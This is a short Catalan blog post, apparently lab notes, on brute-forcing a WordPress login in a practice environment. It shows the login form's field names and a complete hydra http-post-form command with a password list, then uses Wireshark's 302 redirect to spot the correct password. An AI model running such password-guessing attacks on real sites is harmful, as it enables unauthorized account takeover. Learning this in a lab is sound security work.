anar a la ruta http://bt.example.net/webexploitation_package_02/wordpress/wp-login.php
(abans arreglar entrant com administrador el directori de que enlloc de treballar com localhost, que es cridi a bt.example.net que és el hostname de la màquina) - de la mateixa manera a la kali afegim a host la entrada bt.example.net
mirem fitxer wp-login.php de validació de wordpress per identificar les variables a parametritzar amb hydra.
<form name="loginform" id="loginform" action="wp-login.php" method="post"> <p><label>Username:<br /><input type="text" name="log" id="log" value="" size="20" tabindex="1" /></label></p> <p><label>Password:<br /> <input type="password" name="pwd" id="pwd" value="" size="20" tabindex="2" /></label></p> <p class="submit">
hydra bt.example.net -l admin -P /usr/share/john/password.lst
http-post-form '/webexploitation_package_02/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:failed;'
en aquest sistema el sistema no identifica correctament encertar el password , pero si ho podem
vveure en el wireshark la redirecció que es produeix en posar la combinació correcta. Ho identifiquem
per se la redirecció 302
buscant el port origen de la comunicació 33873 em serveix per trobar la combinació correcta.
No hay comentarios:
Publicar un comentario